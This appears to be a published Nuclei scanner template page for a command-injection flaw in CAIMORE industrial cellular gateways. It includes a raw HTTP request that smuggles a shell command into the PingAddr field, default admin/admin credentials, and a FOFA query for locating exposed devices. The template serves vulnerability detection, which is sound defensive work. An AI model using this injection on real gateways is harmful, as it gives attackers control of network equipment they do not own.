Skip to content

CAIMORE Gateway - Remote Code Execution

ID: caimore-gateway-rce

Severity: high

Author: momika233

Tags: ciamore-gateway,rce,authenticated,intrusive

The gateway of Xiamen Caimao Communication Technology Co., Ltd. is designed with open software architecture. It is a metal shell design, with two Ethernet RJ45 interfaces, and an industrial design wireless gateway using 3G/4G/5G wide area network for Internet communication. There is a command execution vulnerability in the formping file of the gateway of Xiamen Caimao Communication Technology Co., Ltd. An attacker can use this vulnerability to arbitrarily execute code on the server side, write to the back door, obtain server permissions, and then control the entire web server.

id: caimore-gateway-rce
info:
name: CAIMORE Gateway - Remote Code Execution
author: momika233
severity: high
description: |
The gateway of Xiamen Caimao Communication Technology Co., Ltd. is designed with open software architecture. It is a metal shell design, with two Ethernet RJ45 interfaces, and an industrial design wireless gateway using 3G/4G/5G wide area network for Internet communication. There is a command execution vulnerability in the formping file of the gateway of Xiamen Caimao Communication Technology Co., Ltd. An attacker can use this vulnerability to arbitrarily execute code on the server side, write to the back door, obtain server permissions, and then control the entire web server.
reference:
- https://www.ctfiot.com/126482.html
metadata:
max-request: 2
fofa-query: app="CAIMORE-Gateway"
tags: ciamore-gateway,rce,authenticated,intrusive
http:
- raw:
- |
POST /goform/formping HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
Accept-Encoding: gzip
PingAddr=127.0.0.1%7Cecho%20{{randstr}}&PingPackNumb=1&PingMsg=
- |
GET /pingmessages HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
Accept-Encoding: gzip
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "{{randstr}}"
- type: status
status:
- 200
# digest: 4b0a00483046022100a359cd330a5f9870931026ddd1bae524ed7d4ed2f415248f8f2a74af6a262b190221008d3ef01eeb39b96b2d01a7b2717c0e2b47266f9e5b433cf54cb4aacb85037c46:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/caimore-gateway-rce.yaml"

View on Github